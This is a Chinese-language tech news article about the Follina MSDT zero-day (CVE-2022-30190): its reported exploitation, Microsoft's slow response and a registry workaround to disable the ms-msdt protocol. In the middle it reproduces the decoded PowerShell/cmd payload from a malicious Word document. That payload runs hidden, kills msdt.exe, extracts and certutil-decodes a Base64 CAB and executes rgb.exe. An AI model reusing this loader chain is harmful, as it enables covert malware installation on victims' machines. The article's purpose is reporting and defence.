危!所有 Windows 用户请注意:该高危零日漏洞已被利用 7 周
所有 Windows 用户请注意:有一个高危零日漏洞已存在至少 7 周,有相关证据表明该漏洞已被黑客利用,借此在用户设备上“悄无声息”地安装恶意程序!
起初微软不以为意
根据一位 Shadow Chaser Group 研究人员在推特上透露的消息表示,该漏洞存在于 Microsoft Support Diagnostic Tool(即微软支持诊断工具,以下简称 MSDT),且早在 4 月 12 日就报告给微软了,甚至为了证明其严重性,还附带了该漏洞已被黑客利用进行攻击的证明。
但当时的微软并没有将此视作安全漏洞,因为其安全响应中心团队认为,MSDT 在执行有效负载之前需要密码。可上周五,在研究员 Kevin Beaumont 发现上传到 VirusTotal 的 Word 文档利用了某种未知的攻击媒介时,该漏洞再次露出马脚。
据 Kevin Beaumont 分析,该文档是通过 Word 从远程 Web 服务器检索 HTML 文件,随后使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。
这个过程听起来似乎有些不可能,但 Kevin Beaumont 解释道,当文档中的命令被解码时,它们会转换为:
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
启动隐藏窗口:
1.如果 msdt.exe 正在运行,则终止它
2.循环遍历 RAR 中的文件,查找编码 CAB 文件的 Base64 字符串
(1)将此 Base64 编码的 CAB 文件存储为 1.t
(2)解码 Base64 编码的 CAB 文件保存为 1.c 将 1.c CAB
(3)文件展开到当前目录中,最后:
(4)执行 rgb.exe(可能压缩在 1.c CAB 文件中)
7 周后的“幡然醒悟”
于是将近 7 周过后,本周一微软终于“醒悟”了:将该漏洞标识为 CVE-2022-30190,并将其形容为“关键”漏洞,且目前所有受支持的 Windows 版本都会受到影响。
当从调用应用程序(如 Word)使用 URL 协议调用 MSDT 时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可使用调用应用程序的权限运行任意代码。随后,攻击者可在权限允许范围内安装程序,查看、更改或删除数据,或创建新帐户。
相较于介绍漏洞、发布补丁并督促用户更新的一般流程不同,本次微软发布该漏洞的公告时,并未推出任何补丁,解决方法也只是建议用户按照以下步骤禁止 MSDT URL 协议:
1.以管理员身份运行命令提示符。
2.若要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename” 。
3.执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”。
鉴于目前微软尚未推出该漏洞的对应补丁,而该漏洞又属于“高危”,建议所有经常使用 Microsoft Office 的用户在微软推出进一步防范措施前,应确保完全关闭 MSDT URL 协议,并对从互联网上下载的所有文档进行必要的审查。
参考链接:
https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
— 推荐阅读 —
一键三连 「分享」「点赞」「在看」
成就一亿技术人